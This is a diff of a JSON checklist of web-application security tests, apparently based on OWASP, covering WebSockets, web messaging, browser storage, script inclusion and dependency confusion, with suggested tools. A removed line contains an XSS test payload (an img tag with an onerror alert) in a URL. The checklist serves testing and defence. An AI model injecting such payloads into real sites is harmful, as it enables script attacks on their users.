  "key": "web_sockets",
850
1022
  "title": "Testing WebSockets",
851
1023
  "caption": "OTG-CLIENT-010, WAHHM - Test Handling of Input",
852
- "description": "Identify that the application is using WebSockets by inspecting ws:// or wss:// URI scheme.\nUse Google Chrome's Developer Tools to view the Network WebSocket communication.\nCheck Origin, Confidentiality and Integrity, Authentication, Authorization, Input Sanitization",
853
- "tools": "Burp Proxy, Chrome, ZAP, WebSocket Client"
1024
+ "description": "Check WebSocket endpoints by inspecting ws:// or wss:// URI scheme for proper authorization and data handling.",
1025
+ "tools": "Burp Suite, wscat, wssip, ZAP"
854
1026
  },
855
1027
  {
856
1028
  "key": "web_messaging",
857
- "title": "Test Web Messaging",
1029
+ "title": "Testing Web Messaging",
858
1030
  "caption": "OTG-CLIENT-011, WAHHM - Test Handling of Input",
859
- "description": "Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains",
860
- "tools": "Burp Proxy, ZAP"
1031
+ "description": "Evaluate JavaScript Web Messaging implementation, focusing on validation of origin restrictions and secure data processing, including trusted domains.",
1032
+ "tools": "Browser, Burp Suite, ZAP"
861
1033
  },
862
1034
  {
863
- "key": "local_storage",
864
- "title": "Test Local Storage",
1035
+ "key": "browser_storage",
1036
+ "title": "Testing Browser Storage",
865
1037
  "caption": "OTG-CLIENT-012, WAHHM - Miscellaneous Tests",
866
- "vrt_category": "server_security_misconfiguration",
867
- "description": "Determine whether the website is storing sensitive data in the storage.\nXSS in localstorage http://server/StoragePOC.html#<img src=x onerror=alert(1)>",
868
- "tools": "Chrome, Firebug, Burp Proxy, ZAP"
1038
+ "description": "Evaluate the secure implementation and appropriate use of browser storage mechanisms (LocalStorage, SessionStorage, IndexedDB, Cookies) to prevent unauthorized access and data leakage.",
1039
+ "tools": "Browser"
1040
+ },
1041
+ {
1042
+ "key": "script_inclusion",
1043
+ "title": "Testing for Cross-Site Script Inclusion",
1044
+ "caption": "OTG-CLIENT-013",
1045
+ "description": "Verify the application's resistance to the inclusion of malicious, externally hosted JavaScript code within its execution context.",
1046
+ "tools": "Browser, Burp Suite, ZAP"
1047
+ },
1048
+ {
1049
+ "key": "outdated_javascript",
1050
+ "title": "Testing for Outdated JavaScript Dependency",
1051
+ "caption": "",
1052
+ "description": "Identify and assess outdated JavaScript dependencies for known vulnerabilities.",
1053
+ "tools": "BuiltWith, retire.js, Wappalyzer"
1054
+ },
1055
+ {
1056
+ "key": "dependency_confusion",
1057
+ "title": "Testing for Dependency Confusion",
1058
+ "caption": "",
1059
+ "description": "Validate that the application's build process and package manager are configured to exclusively source internal dependencies from trusted, private registries, mitigating dependency confusion vulnerabilities.",
1060
+ "tools": "confused, gau, snync, waybackurls"
869
1061
  }
870
1062
  ]
871
1063
  },